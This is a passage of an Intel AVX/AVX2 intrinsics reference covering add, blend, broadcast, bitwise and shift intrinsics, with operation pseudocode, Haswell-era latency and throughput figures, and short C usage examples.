
FOR j := 0 to 15
    i := j*16
    dst[i+15:i] := a[i+15:i] + b[i+15:i]
ENDFOR
dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 0.5
vpaddd
__m256i _mm256_add_epi32 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_add_epi32 (__m256i a, __m256i b)
#include <immintrin.h>
Instruction: vpaddd ymm, ymm, ymm
CPUID Flags: AVX2

Description

Add packed 32-bit integers in a and b, and store the results in dst.

Operation

FOR j := 0 to 7
    i := j*32
    dst[i+31:i] := a[i+31:i] + b[i+31:i]
ENDFOR
dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 0.5
vpaddq
__m256i _mm256_add_epi64 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_add_epi64 (__m256i a, __m256i b)
#include <immintrin.h>
Instruction: vpaddq ymm, ymm, ymm
CPUID Flags: AVX2

Description

Add packed 64-bit integers in a and b, and store the results in dst.

Operation

FOR j := 0 to 3
    i := j*64
    dst[i+63:i] := a[i+63:i] + b[i+63:i]
ENDFOR
dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 0.5
vpaddb
__m256i _mm256_add_epi8 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_add_epi8 (__m256i a, __m256i b)
#include <immintrin.h>
Instruction: vpaddb ymm, ymm, ymm
CPUID Flags: AVX2

Description

Add packed 8-bit integers in a and b, and store the results in dst.

Operation

FOR j := 0 to 31
    i := j*8
    dst[i+7:i] := a[i+7:i] + b[i+7:i]
ENDFOR
dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 0.5
vaddpd
__m256d _mm256_add_pd (__m256d a, __m256d b)

Synopsis

__m256d _mm256_add_pd (__m256d a, __m256d b)
#include <immintrin.h>
Instruction: vaddpd ymm, ymm, ymm
CPUID Flags: AVX

Description

Add packed double-precision (64-bit) floating-point elements in a and b, and store the results in dst.

Operation

FOR j := 0 to 3
    i := j*64
    dst[i+63:i] := a[i+63:i] + b[i+63:i]
ENDFOR
dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3 1
Ivy Bridge 3 1
Sandy Bridge 3 1
vaddps
__m256 _mm256_add_ps (__m256 a, __m256 b)

Synopsis

__m256 _mm256_add_ps (__m256 a, __m256 b)
#include <immintrin.h>
Instruction: vaddps ymm, ymm, ymm
CPUID Flags: AVX

Description

Add packed single-precision (32-bit) floating-point elements in a and b, and store the results in dst.

Operation

FOR j := 0 to 7
    i := j*32
    dst[i+31:i] := a[i+31:i] + b[i+31:i]
ENDFOR
dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3 1
Ivy Bridge 3 1
Sandy Bridge 3 1
vpaddsw
__m256i _mm256_adds_epi16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_adds_epi16 (__m256i a, __m256i b)
#include <immintrin.h>
Instruction: vpaddsw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Add packed 16-bit integers in a and b using saturation, and store the results in dst.

Operation

FOR j := 0 to 15
    i := j*16
    dst[i+15:i] := Saturate_To_Int16( a[i+15:i] + b[i+15:i] )
ENDFOR
dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpaddsb
__m256i _mm256_adds_epi8 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_adds_epi8 (__m256i a, __m256i b)
#include <immintrin.h>
Instruction: vpaddsb ymm, ymm, ymm
CPUID Flags: AVX2

Description

Add packed 8-bit integers in a and b using saturation, and store the results in dst.

Operation

FOR j := 0 to 31
    i := j*8
    dst[i+7:i] := Saturate_To_Int8( a[i+7:i] + b[i+7:i] )
ENDFOR
dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 0.5
vpaddusw
__m256i _mm256_adds_epu16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_adds_epu16 (__m256i a, __m256i b)
#include <immintrin.h>
Instruction: vpaddusw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Add packed unsigned 16-bit integers in a and b using saturation, and store the results in dst.

Operation

FOR j := 0 to 15 i := j*16 dst[i+15:i] := Saturate_To_UnsignedInt16( a[i+15:i] + b[i+15:i] ) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpaddusb
__m256i _mm256_adds_epu8 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_adds_epu8 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpaddusb ymm, ymm, ymm
CPUID Flags: AVX2

Description

Add packed unsigned 8-bit integers in a and b using saturation, and store the results in dst.

Operation

FOR j := 0 to 31 i := j*8 dst[i+7:i] := Saturate_To_UnsignedInt8( a[i+7:i] + b[i+7:i] ) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 0.5
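
The saturating variants differ from the plain adds only in how overflow is handled. A small sketch (same build assumptions as the earlier example) contrasting the wrapping vpaddb with the saturating vpaddusb:

#include <immintrin.h>
#include <stdio.h>

int main(void)
{
    __m256i a = _mm256_set1_epi8((char)250);   /* every byte = 250 */
    __m256i b = _mm256_set1_epi8(10);          /* every byte = 10  */

    __m256i wrap = _mm256_add_epi8(a, b);      /* vpaddb: 250+10 wraps around to 4 */
    __m256i sat  = _mm256_adds_epu8(a, b);     /* vpaddusb: clamps to 255          */

    unsigned char w[32], s[32];
    _mm256_storeu_si256((__m256i *)w, wrap);
    _mm256_storeu_si256((__m256i *)s, sat);
    printf("wrapping: %d  saturating: %d\n", w[0], s[0]);   /* 4 vs 255 */
    return 0;
}
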
vaddsubpd
__m256d _mm256_addsub_pd (__m256d a, __m256d b)

Synopsis

__m256d _mm256_addsub_pd (__m256d a, __m256d b)
#include «immintrin.h»
Instruction: vaddsubpd ymm, ymm, ymm
CPUID Flags: AVX

Description

Alternatively add and subtract packed double-precision (64-bit) floating-point elements in a to/from packed elements in b, and store the results in dst.

Operation

FOR j := 0 to 3 i := j*64 IF (j is even) dst[i+63:i] := a[i+63:i] - b[i+63:i] ELSE dst[i+63:i] := a[i+63:i] + b[i+63:i] FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3 1
Ivy Bridge 3 1
Sandy Bridge 3 1
vaddsubps
__m256 _mm256_addsub_ps (__m256 a, __m256 b)

Synopsis

__m256 _mm256_addsub_ps (__m256 a, __m256 b)
#include «immintrin.h»
Instruction: vaddsubps ymm, ymm, ymm
CPUID Flags: AVX

Description

Alternatively add and subtract packed single-precision (32-bit) floating-point elements in a to/from packed elements in b, and store the results in dst.

Operation

FOR j := 0 to 7 i := j*32 IF (j is even) dst[i+31:i] := a[i+31:i] - b[i+31:i] ELSE dst[i+31:i] := a[i+31:i] + b[i+31:i] FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3 1
Ivy Bridge 3 1
Sandy Bridge 3 1
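
A short sketch of the alternating subtract/add pattern of vaddsubps (AVX only, so -mavx suffices; _mm256_set1_ps, _mm256_setr_ps and _mm256_storeu_ps are standard helpers not listed in this excerpt):

#include <immintrin.h>
#include <stdio.h>

int main(void)
{
    __m256 a = _mm256_set1_ps(10.0f);
    __m256 b = _mm256_setr_ps(1, 2, 3, 4, 5, 6, 7, 8);
    __m256 r = _mm256_addsub_ps(a, b);   /* even lanes: a-b, odd lanes: a+b */

    float out[8];
    _mm256_storeu_ps(out, r);
    for (int i = 0; i < 8; i++)
        printf("%.0f ", out[i]);          /* 9 12 7 14 5 16 3 18 */
    printf("\n");
    return 0;
}
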
vpalignr
__m256i _mm256_alignr_epi8 (__m256i a, __m256i b, const int count)

Synopsis

__m256i _mm256_alignr_epi8 (__m256i a, __m256i b, const int count)
#include «immintrin.h»
Instruction: vpalignr ymm, ymm, ymm, imm
CPUID Flags: AVX2

Description

Concatenate pairs of 16-byte blocks in a and b into a 32-byte temporary result, shift the result right by count bytes, and store the low 16 bytes in dst.

Operation

FOR j := 0 to 1 i := j*128 tmp[255:0] := ((a[i+127:i] << 128) OR b[i+127:i]) >> (count[7:0]*8) dst[i+127:i] := tmp[127:0] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vandpd
__m256d _mm256_and_pd (__m256d a, __m256d b)

Synopsis

__m256d _mm256_and_pd (__m256d a, __m256d b)
#include «immintrin.h»
Instruction: vandpd ymm, ymm, ymm
CPUID Flags: AVX

Description

Compute the bitwise AND of packed double-precision (64-bit) floating-point elements in a and b, and store the results in dst.

Operation

FOR j := 0 to 3 i := j*64 dst[i+63:i] := (a[i+63:i] AND b[i+63:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vandps
__m256 _mm256_and_ps (__m256 a, __m256 b)

Synopsis

__m256 _mm256_and_ps (__m256 a, __m256 b)
#include «immintrin.h»
Instruction: vandps ymm, ymm, ymm
CPUID Flags: AVX

Description

Compute the bitwise AND of packed single-precision (32-bit) floating-point elements in a and b, and store the results in dst.

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := (a[i+31:i] AND b[i+31:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vpand
__m256i _mm256_and_si256 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_and_si256 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpand ymm, ymm, ymm
CPUID Flags: AVX2

Description

Compute the bitwise AND of 256 bits (representing integer data) in a and b, and store the result in dst.

Operation

dst[255:0] := (a[255:0] AND b[255:0]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vandnpd
__m256d _mm256_andnot_pd (__m256d a, __m256d b)

Synopsis

__m256d _mm256_andnot_pd (__m256d a, __m256d b)
#include «immintrin.h»
Instruction: vandnpd ymm, ymm, ymm
CPUID Flags: AVX

Description

Compute the bitwise NOT of packed double-precision (64-bit) floating-point elements in a and then AND with b, and store the results in dst.

Operation

FOR j := 0 to 3 i := j*64 dst[i+63:i] := ((NOT a[i+63:i]) AND b[i+63:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vandnps
__m256 _mm256_andnot_ps (__m256 a, __m256 b)

Synopsis

__m256 _mm256_andnot_ps (__m256 a, __m256 b)
#include «immintrin.h»
Instruction: vandnps ymm, ymm, ymm
CPUID Flags: AVX

Description

Compute the bitwise NOT of packed single-precision (32-bit) floating-point elements in a and then AND with b, and store the results in dst.

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := ((NOT a[i+31:i]) AND b[i+31:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vpandn
__m256i _mm256_andnot_si256 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_andnot_si256 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpandn ymm, ymm, ymm
CPUID Flags: AVX2

Description

Compute the bitwise NOT of 256 bits (representing integer data) in a and then AND with b, and store the result in dst.

Operation

dst[255:0] := ((NOT a[255:0]) AND b[255:0]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
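
A sketch showing the typical masking use of vpand and vpandn; note that the NOT in vpandn applies to the first operand (same build assumptions as the earlier sketches):

#include <immintrin.h>
#include <stdio.h>

int main(void)
{
    __m256i data = _mm256_set1_epi32(0x12345678);
    __m256i mask = _mm256_set1_epi32(0x0000FFFF);

    __m256i low  = _mm256_and_si256(data, mask);     /* vpand:  keep the low 16 bits */
    __m256i high = _mm256_andnot_si256(mask, data);  /* vpandn: (~mask) & data       */

    int lo[8], hi[8];
    _mm256_storeu_si256((__m256i *)lo, low);
    _mm256_storeu_si256((__m256i *)hi, high);
    printf("low=0x%08X high=0x%08X\n", (unsigned)lo[0], (unsigned)hi[0]);
    /* low=0x00005678 high=0x12340000 */
    return 0;
}
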
vpavgw
__m256i _mm256_avg_epu16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_avg_epu16 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpavgw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Average packed unsigned 16-bit integers in a and b, and store the results in dst.

Operation

FOR j := 0 to 15 i := j*16 dst[i+15:i] := (a[i+15:i] + b[i+15:i] + 1) >> 1 ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpavgb
__m256i _mm256_avg_epu8 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_avg_epu8 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpavgb ymm, ymm, ymm
CPUID Flags: AVX2

Description

Average packed unsigned 8-bit integers in a and b, and store the results in dst.

Operation

FOR j := 0 to 31 i := j*8 dst[i+7:i] := (a[i+7:i] + b[i+7:i] + 1) >> 1 ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 0.5
vpblendw
__m256i _mm256_blend_epi16 (__m256i a, __m256i b, const int imm8)

Synopsis

__m256i _mm256_blend_epi16 (__m256i a, __m256i b, const int imm8)
#include «immintrin.h»
Instruction: vpblendw ymm, ymm, ymm, imm
CPUID Flags: AVX2

Description

Blend packed 16-bit integers from a and b using control mask imm8, and store the results in dst.

Operation

FOR j := 0 to 15 i := j*16 IF imm8[j%8] dst[i+15:i] := b[i+15:i] ELSE dst[i+15:i] := a[i+15:i] FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
vpblendd
__m128i _mm_blend_epi32 (__m128i a, __m128i b, const int imm8)

Synopsis

__m128i _mm_blend_epi32 (__m128i a, __m128i b, const int imm8)
#include «immintrin.h»
Instruction: vpblendd xmm, xmm, xmm, imm
CPUID Flags: AVX2

Description

Blend packed 32-bit integers from a and b using control mask imm8, and store the results in dst.

Operation

FOR j := 0 to 3 i := j*32 IF imm8[j%8] dst[i+31:i] := b[i+31:i] ELSE dst[i+31:i] := a[i+31:i] FI ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 1 0.33
vpblendd
__m256i _mm256_blend_epi32 (__m256i a, __m256i b, const int imm8)

Synopsis

__m256i _mm256_blend_epi32 (__m256i a, __m256i b, const int imm8)
#include «immintrin.h»
Instruction: vpblendd ymm, ymm, ymm, imm
CPUID Flags: AVX2

Description

Blend packed 32-bit integers from a and b using control mask imm8, and store the results in dst.

Operation

FOR j := 0 to 7 i := j*32 IF imm8[j%8] dst[i+31:i] := b[i+31:i] ELSE dst[i+31:i] := a[i+31:i] FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 0.33
vblendpd
__m256d _mm256_blend_pd (__m256d a, __m256d b, const int imm8)

Synopsis

__m256d _mm256_blend_pd (__m256d a, __m256d b, const int imm8)
#include «immintrin.h»
Instruction: vblendpd ymm, ymm, ymm, imm
CPUID Flags: AVX

Description

Blend packed double-precision (64-bit) floating-point elements from a and b using control mask imm8, and store the results in dst.

Operation

FOR j := 0 to 3 i := j*64 IF imm8[j%8] dst[i+63:i] := b[i+63:i] ELSE dst[i+63:i] := a[i+63:i] FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 0.33
Ivy Bridge 1 0.5
Sandy Bridge 1 0.5
vblendps
__m256 _mm256_blend_ps (__m256 a, __m256 b, const int imm8)

Synopsis

__m256 _mm256_blend_ps (__m256 a, __m256 b, const int imm8)
#include «immintrin.h»
Instruction: vblendps ymm, ymm, ymm, imm
CPUID Flags: AVX

Description

Blend packed single-precision (32-bit) floating-point elements from a and b using control mask imm8, and store the results in dst.

Operation

FOR j := 0 to 7 i := j*32 IF imm8[j%8] dst[i+31:i] := b[i+31:i] ELSE dst[i+31:i] := a[i+31:i] FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 0.33
Ivy Bridge 1 0.5
Sandy Bridge 1 0.5
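
vblendps selects lanes with a compile-time immediate, one bit per lane. A minimal sketch (the imm8 value is chosen arbitrarily for illustration):

#include <immintrin.h>
#include <stdio.h>

int main(void)
{
    __m256 a = _mm256_set1_ps(0.0f);
    __m256 b = _mm256_set1_ps(1.0f);

    /* imm8 = 0xA5 = 0b10100101: lanes 0, 2, 5, 7 come from b, the rest from a */
    __m256 r = _mm256_blend_ps(a, b, 0xA5);

    float out[8];
    _mm256_storeu_ps(out, r);
    for (int i = 0; i < 8; i++)
        printf("%.0f ", out[i]);   /* 1 0 1 0 0 1 0 1 */
    printf("\n");
    return 0;
}
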
vpblendvb
__m256i _mm256_blendv_epi8 (__m256i a, __m256i b, __m256i mask)

Synopsis

__m256i _mm256_blendv_epi8 (__m256i a, __m256i b, __m256i mask)
#include «immintrin.h»
Instruction: vpblendvb ymm, ymm, ymm, ymm
CPUID Flags: AVX2

Description

Blend packed 8-bit integers from a and b using mask, and store the results in dst.

Operation

FOR j := 0 to 31 i := j*8 IF mask[i+7] dst[i+7:i] := b[i+7:i] ELSE dst[i+7:i] := a[i+7:i] FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 2 2
vblendvpd
__m256d _mm256_blendv_pd (__m256d a, __m256d b, __m256d mask)

Synopsis

__m256d _mm256_blendv_pd (__m256d a, __m256d b, __m256d mask)
#include «immintrin.h»
Instruction: vblendvpd ymm, ymm, ymm, ymm
CPUID Flags: AVX

Description

Blend packed double-precision (64-bit) floating-point elements from a and b using mask, and store the results in dst.

Operation

FOR j := 0 to 3 i := j*64 IF mask[i+63] dst[i+63:i] := b[i+63:i] ELSE dst[i+63:i] := a[i+63:i] FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 2 2
Ivy Bridge 2 1
Sandy Bridge 2 1
vblendvps
__m256 _mm256_blendv_ps (__m256 a, __m256 b, __m256 mask)

Synopsis

__m256 _mm256_blendv_ps (__m256 a, __m256 b, __m256 mask)
#include «immintrin.h»
Instruction: vblendvps ymm, ymm, ymm, ymm
CPUID Flags: AVX

Description

Blend packed single-precision (32-bit) floating-point elements from a and b using mask, and store the results in dst.

Operation

FOR j := 0 to 7 i := j*32 IF mask[i+31] dst[i+31:i] := b[i+31:i] ELSE dst[i+31:i] := a[i+31:i] FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 2 2
Ivy Bridge 2 1
Sandy Bridge 2 1
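
When the selection is only known at run time, the variable-blend form takes a mask vector whose per-lane sign bit decides the source. A sketch that builds the mask with _mm256_cmp_ps (documented further down in this listing) to compute a per-lane maximum:

#include <immintrin.h>
#include <stdio.h>

int main(void)
{
    __m256 a = _mm256_setr_ps(1, 5, 2, 8, 3, 9, 0, 7);
    __m256 b = _mm256_setr_ps(4, 1, 6, 2, 7, 3, 5, 6);

    __m256 gt = _mm256_cmp_ps(a, b, _CMP_GT_OQ);   /* all-ones where a > b          */
    __m256 mx = _mm256_blendv_ps(b, a, gt);        /* vblendvps: pick a where a > b */

    float out[8];
    _mm256_storeu_ps(out, mx);
    for (int i = 0; i < 8; i++)
        printf("%.0f ", out[i]);                   /* 4 5 6 8 7 9 5 7 */
    printf("\n");
    return 0;
}
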
vbroadcastf128
__m256d _mm256_broadcast_pd (__m128d const * mem_addr)

Synopsis

__m256d _mm256_broadcast_pd (__m128d const * mem_addr)
#include «immintrin.h»
Instruction: vbroadcastf128 ymm, m128
CPUID Flags: AVX

Description

Broadcast 128 bits from memory (composed of 2 packed double-precision (64-bit) floating-point elements) to all elements of dst.

Operation

tmp[127:0] = MEM[mem_addr+127:mem_addr] dst[127:0] := tmp[127:0] dst[255:128] := tmp[127:0] dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Ivy Bridge 1
Sandy Bridge 1
vbroadcastf128
__m256 _mm256_broadcast_ps (__m128 const * mem_addr)

Synopsis

__m256 _mm256_broadcast_ps (__m128 const * mem_addr)
#include «immintrin.h»
Instruction: vbroadcastf128 ymm, m128
CPUID Flags: AVX

Description

Broadcast 128 bits from memory (composed of 4 packed single-precision (32-bit) floating-point elements) to all elements of dst.

Operation

tmp[127:0] = MEM[mem_addr+127:mem_addr] dst[127:0] := tmp[127:0] dst[255:128] := tmp[127:0] dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Ivy Bridge 1
Sandy Bridge 1
vbroadcastsd
__m256d _mm256_broadcast_sd (double const * mem_addr)

Synopsis

__m256d _mm256_broadcast_sd (double const * mem_addr)
#include «immintrin.h»
Instruction: vbroadcastsd ymm, m64
CPUID Flags: AVX

Description

Broadcast a double-precision (64-bit) floating-point element from memory to all elements of dst.

Operation

tmp[63:0] = MEM[mem_addr+63:mem_addr] FOR j := 0 to 3 i := j*64 dst[i+63:i] := tmp[63:0] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Ivy Bridge 1
Sandy Bridge 1
vbroadcastss
__m128 _mm_broadcast_ss (float const * mem_addr)

Synopsis

__m128 _mm_broadcast_ss (float const * mem_addr)
#include «immintrin.h»
Instruction: vbroadcastss xmm, m32
CPUID Flags: AVX

Description

Broadcast a single-precision (32-bit) floating-point element from memory to all elements of dst.

Operation

tmp[31:0] = MEM[mem_addr+31:mem_addr] FOR j := 0 to 3 i := j*32 dst[i+31:i] := tmp[31:0] ENDFOR dst[MAX:128] := 0
vbroadcastss
__m256 _mm256_broadcast_ss (float const * mem_addr)

Synopsis

__m256 _mm256_broadcast_ss (float const * mem_addr)
#include «immintrin.h»
Instruction: vbroadcastss ymm, m32
CPUID Flags: AVX

Description

Broadcast a single-precision (32-bit) floating-point element from memory to all elements of dst.

Operation

tmp[31:0] = MEM[mem_addr+31:mem_addr] FOR j := 0 to 7 i := j*32 dst[i+31:i] := tmp[31:0] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Ivy Bridge 1
Sandy Bridge 1
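
vbroadcastss is the usual way to splat a scalar across a vector, for instance to scale an array by a constant. A minimal sketch (_mm256_mul_ps and _mm256_loadu_ps are standard AVX intrinsics not listed in this excerpt):

#include <immintrin.h>
#include <stdio.h>

int main(void)
{
    float scale = 2.5f;
    float v[8]  = {1, 2, 3, 4, 5, 6, 7, 8};
    float out[8];

    __m256 s = _mm256_broadcast_ss(&scale);   /* vbroadcastss ymm, m32 */
    __m256 x = _mm256_loadu_ps(v);
    __m256 y = _mm256_mul_ps(x, s);           /* scale all 8 lanes     */

    _mm256_storeu_ps(out, y);
    for (int i = 0; i < 8; i++)
        printf("%.1f ", out[i]);              /* 2.5 5.0 7.5 ... 20.0 */
    printf("\n");
    return 0;
}
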
vpbroadcastb
__m128i _mm_broadcastb_epi8 (__m128i a)

Synopsis

__m128i _mm_broadcastb_epi8 (__m128i a)
#include «immintrin.h»
Instruction: vpbroadcastb xmm, xmm
CPUID Flags: AVX2

Description

Broadcast the low packed 8-bit integer from a to all elements of dst.

Operation

FOR j := 0 to 15 i := j*8 dst[i+7:i] := a[7:0] ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpbroadcastb
__m256i _mm256_broadcastb_epi8 (__m128i a)

Synopsis

__m256i _mm256_broadcastb_epi8 (__m128i a)
#include «immintrin.h»
Instruction: vpbroadcastb ymm, xmm
CPUID Flags: AVX2

Description

Broadcast the low packed 8-bit integer from a to all elements of dst.

Operation

FOR j := 0 to 31 i := j*8 dst[i+7:i] := a[7:0] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
vpbroadcastd
__m128i _mm_broadcastd_epi32 (__m128i a)

Synopsis

__m128i _mm_broadcastd_epi32 (__m128i a)
#include «immintrin.h»
Instruction: vpbroadcastd xmm, xmm
CPUID Flags: AVX2

Description

Broadcast the low packed 32-bit integer from a to all elements of dst.

Operation

FOR j := 0 to 3 i := j*32 dst[i+31:i] := a[31:0] ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpbroadcastd
__m256i _mm256_broadcastd_epi32 (__m128i a)

Synopsis

__m256i _mm256_broadcastd_epi32 (__m128i a)
#include «immintrin.h»
Instruction: vpbroadcastd ymm, xmm
CPUID Flags: AVX2

Description

Broadcast the low packed 32-bit integer from a to all elements of dst.

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := a[31:0] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
vpbroadcastq
__m128i _mm_broadcastq_epi64 (__m128i a)

Synopsis

__m128i _mm_broadcastq_epi64 (__m128i a)
#include «immintrin.h»
Instruction: vpbroadcastq xmm, xmm
CPUID Flags: AVX2

Description

Broadcast the low packed 64-bit integer from a to all elements of dst.

Operation

FOR j := 0 to 1 i := j*64 dst[i+63:i] := a[63:0] ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpbroadcastq
__m256i _mm256_broadcastq_epi64 (__m128i a)

Synopsis

__m256i _mm256_broadcastq_epi64 (__m128i a)
#include «immintrin.h»
Instruction: vpbroadcastq ymm, xmm
CPUID Flags: AVX2

Description

Broadcast the low packed 64-bit integer from a to all elements of dst.

Operation

FOR j := 0 to 3 i := j*64 dst[i+63:i] := a[63:0] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
movddup
__m128d _mm_broadcastsd_pd (__m128d a)

Synopsis

__m128d _mm_broadcastsd_pd (__m128d a)
#include «immintrin.h»
Instruction: movddup xmm, xmm
CPUID Flags: AVX2

Description

Broadcast the low double-precision (64-bit) floating-point element from a to all elements of dst.

Operation

FOR j := 0 to 1 i := j*64 dst[i+63:i] := a[63:0] ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 1
Ivy Bridge 1
Sandy Bridge 1
Westmere 1
Nehalem 1
vbroadcastsd
__m256d _mm256_broadcastsd_pd (__m128d a)

Synopsis

__m256d _mm256_broadcastsd_pd (__m128d a)
#include «immintrin.h»
Instruction: vbroadcastsd ymm, xmm
CPUID Flags: AVX2

Description

Broadcast the low double-precision (64-bit) floating-point element from a to all elements of dst.

Operation

FOR j := 0 to 3 i := j*64 dst[i+63:i] := a[63:0] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
vbroadcasti128
__m256i _mm256_broadcastsi128_si256 (__m128i a)

Synopsis

__m256i _mm256_broadcastsi128_si256 (__m128i a)
#include «immintrin.h»
Instruction: vbroadcasti128 ymm, m128
CPUID Flags: AVX2

Description

Broadcast 128 bits of integer data from a to all 128-bit lanes in dst.

Operation

dst[127:0] := a[127:0] dst[255:128] := a[127:0] dst[MAX:256] := 0
vbroadcastss
__m128 _mm_broadcastss_ps (__m128 a)

Synopsis

__m128 _mm_broadcastss_ps (__m128 a)
#include «immintrin.h»
Instruction: vbroadcastss xmm, xmm
CPUID Flags: AVX2

Description

Broadcast the low single-precision (32-bit) floating-point element from a to all elements of dst.

Operation

FOR j := 0 to 3 i := j*32 dst[i+31:i] := a[31:0] ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 3
vbroadcastss
__m256 _mm256_broadcastss_ps (__m128 a)

Synopsis

__m256 _mm256_broadcastss_ps (__m128 a)
#include «immintrin.h»
Instruction: vbroadcastss ymm, xmm
CPUID Flags: AVX2

Description

Broadcast the low single-precision (32-bit) floating-point element from a to all elements of dst.

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := a[31:0] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
vpbroadcastw
__m128i _mm_broadcastw_epi16 (__m128i a)

Synopsis

__m128i _mm_broadcastw_epi16 (__m128i a)
#include «immintrin.h»
Instruction: vpbroadcastw xmm, xmm
CPUID Flags: AVX2

Description

Broadcast the low packed 16-bit integer from a to all elements of dst.

Operation

FOR j := 0 to 7 i := j*16 dst[i+15:i] := a[15:0] ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpbroadcastw
__m256i _mm256_broadcastw_epi16 (__m128i a)

Synopsis

__m256i _mm256_broadcastw_epi16 (__m128i a)
#include «immintrin.h»
Instruction: vpbroadcastw ymm, xmm
CPUID Flags: AVX2

Description

Broadcast the low packed 16-bit integer from a to all elements of dst.

Operation

FOR j := 0 to 15 i := j*16 dst[i+15:i] := a[15:0] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
vpslldq
__m256i _mm256_bslli_epi128 (__m256i a, const int imm8)

Synopsis

__m256i _mm256_bslli_epi128 (__m256i a, const int imm8)
#include «immintrin.h»
Instruction: vpslldq ymm, ymm, imm
CPUID Flags: AVX2

Description

Shift 128-bit lanes in a left by imm8 bytes while shifting in zeros, and store the results in dst.

Operation

tmp := imm8[7:0] IF tmp > 15 tmp := 16 FI dst[127:0] := a[127:0] << (tmp*8) dst[255:128] := a[255:128] << (tmp*8) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpsrldq
__m256i _mm256_bsrli_epi128 (__m256i a, const int imm8)

Synopsis

__m256i _mm256_bsrli_epi128 (__m256i a, const int imm8)
#include «immintrin.h»
Instruction: vpsrldq ymm, ymm, imm
CPUID Flags: AVX2

Description

Shift 128-bit lanes in a right by imm8 bytes while shifting in zeros, and store the results in dst.

Operation

tmp := imm8[7:0] IF tmp > 15 tmp := 16 FI dst[127:0] := a[127:0] >> (tmp*8) dst[255:128] := a[255:128] >> (tmp*8) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
__m256 _mm256_castpd_ps (__m256d a)

Synopsis

__m256 _mm256_castpd_ps (__m256d a)
#include «immintrin.h»
CPUID Flags: AVX

Description

Cast vector of type __m256d to type __m256. This intrinsic is only used for compilation and does not generate any instructions, thus it has zero latency.
